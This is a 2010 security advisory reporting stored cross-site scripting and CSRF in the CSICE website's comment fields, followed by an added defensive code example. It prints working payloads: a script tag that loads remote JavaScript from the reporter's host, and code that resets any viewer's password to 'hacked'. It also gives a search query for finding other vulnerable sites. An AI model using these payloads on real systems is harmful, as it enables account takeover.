
CSICE Cross Site Request Forgery / Cross Site Scripting

16 Mar 2010. Reported by FB1H2S. Type: packetstorm. Source: packetstormsecurity.com

CSICE website vulnerable to XSS and CSRF attack

Code
`http://www.csice.org/  
suffers from XSS and CSRF (cross-site scripting and cross-site request  
forgery) attacks.  
The vulnerability lies in the post comment fields on the following page.  
Move to this page (only for authenticated users):  
http://www.csice.org/student/subjects.html  
  
and choose a subject, for example  
http://www.csice.org/student/LessonPosting/59/0/view_units.html  
  
Here users are allowed to post comments, but the comments are not  
filtered, possibly allowing anyone to inject scripts too.  
  
For example, we could update a post with a comment like  
<script>alert('Hacked by FB1H2S')</script>  
  
which will get stored in the database, and the next time someone  
views the page, that page will show the JavaScript alert.  
  
This attack could be taken to another extent: now that we can run  
JavaScript on the client side, we may build a script which, when run,  
will change the user's password to a new value. All we have to do is  
update the code in the comment field, and when some other user views  
the page the change-password script will get executed and his or  
her password will be changed.  
  
Consider, for example, posting a comment with this:  
<SCRIPT SRC="http://fb1h2s.byethost15.com/sas.js"></SCRIPT>  
  
What sas.js does is change the user's password to 'hacked' when run on the victim:  
  
var pass_req = createAjaxObject();  
var data = 'hacked';  
alert(data);  
pass_req.open("post","http://www.csice.org/student/ajax_redirect.php?page=student&option=change_password");  
pass_req.setRequestHeader("Content-Type","application/x-www-form-urlencoded");  
pass_req.send("data="+data);  
  
So using this hack we could change any user's/administrator's  
password to a new value.  
  
I am not able to figure out what CMS this site runs on, but it surely is an open source CMS; see inurl:ajax_redirect.php?page=  
you can see a lot of results.  
  
  
Filtering the input will be the way to prevent these issues; have a look at  
our website and this paper on how to prevent such attacks:  
http://www.whitec0de.com/paper/0121  
  
love FB1H2S  
hacking is a matter of time, knowledge and patience  
`
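
The fix the advisory points to, sketched as an added example that is not part of the original advisory or the site's code: stored comments are HTML-encoded on output, and the password change demands the current password in addition to a session-bound token, since a script running in the page's own origin can read a token. All function names and the session/form shapes are hypothetical; only the `data` field name comes from the request shown above.

```javascript
// Added example: hypothetical handlers, not the CSICE site's code.
const crypto = require('crypto');

// Encode the five HTML-significant characters so a stored comment renders as text.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
  }[c]));
}

// Output side of the comment feature: every user-supplied field is encoded.
function renderComment(comment) {
  return '<li class="comment"><b>' + escapeHtml(comment.author) + '</b>: ' +
         escapeHtml(comment.body) + '</li>';
}

function hashPassword(password, salt) {
  return crypto.scryptSync(password, salt, 32);
}

// Constant-time string comparison that tolerates unequal lengths.
function safeEqual(a, b) {
  const x = Buffer.from(String(a)), y = Buffer.from(String(b));
  return x.length === y.length && crypto.timingSafeEqual(x, y);
}

// Constructed session shape: { csrfToken, user: { salt, hash } }.
function newSession(password) {
  const salt = crypto.randomBytes(16);
  return { csrfToken: crypto.randomBytes(32).toString('hex'),
           user: { salt, hash: hashPassword(password, salt) } };
}

// form: { csrf, current, data } where `data` is the new password.
function changePassword(session, form) {
  // Stops cross-site forged requests, which cannot know the session's token.
  if (!form.csrf || !safeEqual(form.csrf, session.csrfToken)) {
    return 'rejected: bad CSRF token';
  }
  // Stops same-origin injected script, which can read the token but not the password.
  const supplied = hashPassword(String(form.current || ''), session.user.salt);
  if (!crypto.timingSafeEqual(supplied, session.user.hash)) {
    return 'rejected: current password required';
  }
  session.user.hash = hashPassword(String(form.data), session.user.salt);
  return 'ok';
}
```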
